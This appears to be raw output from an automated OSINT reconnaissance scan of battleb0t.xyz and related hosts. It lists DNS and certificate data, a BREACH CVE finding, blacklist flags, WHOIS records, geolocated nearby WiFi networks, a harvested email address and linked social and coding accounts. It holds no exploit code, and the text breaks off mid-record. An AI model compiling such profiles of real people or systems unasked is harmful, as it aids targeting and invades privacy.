| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | THW (Net ID: 00:02:6F:DF:78:B4) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | belkin54g (Net ID: 00:17:3F:83:7B:BA) | 32.8608, -79.9746 |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 3 | 0 | None | https://ayhu.xyz/lol.html | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c594cb34339')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13393',
cRay: '7c5f8c594cb34339',
cHash: '405751743fca02b',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
m: 'wei6RtcHCTh5k6jXLRR9uxE1j0nSB1DRW6i/4ZVDPwA=',
i1: 'b4n+etCkfjlnsH7ziL0wjQ==',
i2: 'jFCNa6uhaxi0l2WjI6PNAA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c594cb34339');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c594cb34339';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:09:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-110-154.github.com | 185.199.110.154 |
| 2023-05-12 03:33:51 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | (raw binary string dump omitted) | https://funny.battleb0t.xyz/images/nomnom.jpg |
| 2023-05-12 02:46:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | vscode.battleb0t.xyz |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | funny.battleb0t.xyz | [{"url": "https://funny.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SYNC_XP99MRWR (Net ID: 00:26:B4:2E:5E:DC) | 37.751, -97.822 |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 27 14:22:33.221 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4F:44:FF:23:78:0C:0A:43:E7:DD:21:00:
C4:D1:3F:C3:F1:0D:AC:F3:42:E5:53:7F:E9:12:DC:C9:
41:E7:31:AA:02:20:29:7B:10:84:21:42:A6:BE:66:D5:
B5:62:0E:26:B3:36:1B:B2:1F:F3:F6:F2:FA:99:68:0E:
07:72:EE:35:ED:D1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 14:22:33.315 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:42:E7:DB:8E:AD:39:D9:72:0F:22:03:49:
17:50:EA:AF:42:B9:A0:A7:C7:8A:2E:5E:9D:4B:70:15:
12:36:C9:8C:02:20:70:3E:22:0D:CB:C1:8E:23:7B:D4:
20:A7:55:2C:92:70:7B:00:76:E5:77:1A:32:2B:D4:BB:
A7:E5:BA:F4:CD:50
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: same-origin | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} |
| 2023-05-12 03:08:29 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.109.153 |
| 2023-05-12 03:03:19 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-14n.github.io |
| 2023-05-12 02:46:17 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [172.67.168.252] | 172.67.168.252 |
| 2023-05-12 02:52:56 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://kekw.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | kekw.battleb0t.xyz |
| 2023-05-12 02:54:30 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.80.0/20 | 64.226.81.43 |
| 2023-05-12 02:46:11 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | San Jose, United States | 104.21.71.14 |
| 2023-05-12 02:50:28 | Legal Entity Identifier | No | GLEIF | 0 | 0 | 3 | 0 | None | 5493005GJOH8HLL11157 | Go Daddy, LLC |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.240): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:01 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 188.114.96.1 |
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vscode.battleb0t.xyz | [Cloudflare "521: Web server is down" error page returned for vscode.battleb0t.xyz at 2023-05-12 02:54:21 UTC; HTML body omitted] |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:06:25:7B:42:1D) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/battleb0t | battleb0t |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00cybermonk00.github.io]
https://www.openphish.com/feed.txt | 00cybermonk00.github.io |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | TikTok (Category: social)
https://www.tiktok.com/@patrickpogoda?lang=en | patrickpogoda |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs (Net ID: 00:06:B1:28:66:65) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | GitHub (Category: coding)
https://github.com/ayhu | ayhu |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | VADER (Net ID: 00:06:25:FE:92:52) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | stayover1 (Net ID: 00:02:6F:AD:BE:CF) | 32.8608, -79.9746 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.111): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-0-256.github.io | 185.199.111.153 |
| 2023-05-12 02:55:46 | Internet Name | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | kekw.battleb0t.xyz | 64.226.81.43 |
| 2023-05-12 03:09:27 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 188.114.97.1:443 | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:6F:6D) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus: [2048-bit hex value omitted]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Cafferom (Net ID: 00:00:C5:F7:F0:C4) | 41.8781, -87.6298 |
| 2023-05-12 03:09:57 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.109 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:30:32:62) | 37.7642, -122.3993 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2wire737 (Net ID: 00:02:2D:25:88:EE) | 34.0544, -118.244 |
| 2023-05-12 03:04:07 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WestEd (Net ID: 00:02:2D:05:7E:85) | 37.780462,-122.390564 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.199): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTwq7NaKI (Net ID: F8:2D:C0:AC:63:00) | 37.751, -97.822 |
| 2023-05-12 02:47:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [Hybrid Analysis sandbox report (raw JSON dump omitted)] | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Jenkins_Network (Net ID: 00:1D:D4:64:98:80) | 32.8608, -79.9746 |
| 2023-05-12 03:00:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | vitalie.porcescu@ansa.gov.md | [Hybrid Analysis sandbox report (raw JSON dump omitted)] |
| 2023-05-12 03:16:29 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 46.101.229.70 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_gasten (Net ID: 00:0C:E6:AD:7F:88) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 03:00:38 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@nicproxy.com | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Equiscript (Net ID: 00:18:0A:6F:8C:EC) | 32.8608, -79.9746 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.119 | 34.148.97.127 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | KKR Internal (Net ID: 00:01:21:70:65:30) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | slideshare (Category: social)
https://www.slideshare.net/ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F1:C9:FE) | 37.7642, -122.3993 |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | myemail@example.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://acmephp.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_303"\n "IsoScope_ed8_IE_EarlyTabStart_0xdcc_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3800"\n "IsoScope_ed8_IESQMMUTEX_0_331"\n "IsoScope_ed8_ConnHashTable<3800>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n 
"52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"acmephp.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a href="https://twitter.com/acme_php">" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<i class="fa fa-twitter"></i>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<span>Follow on Twitter</span>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/acme_php">Twitter</a>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/titouangalopin">@tgalopin</a> and" (Indicator: "dir 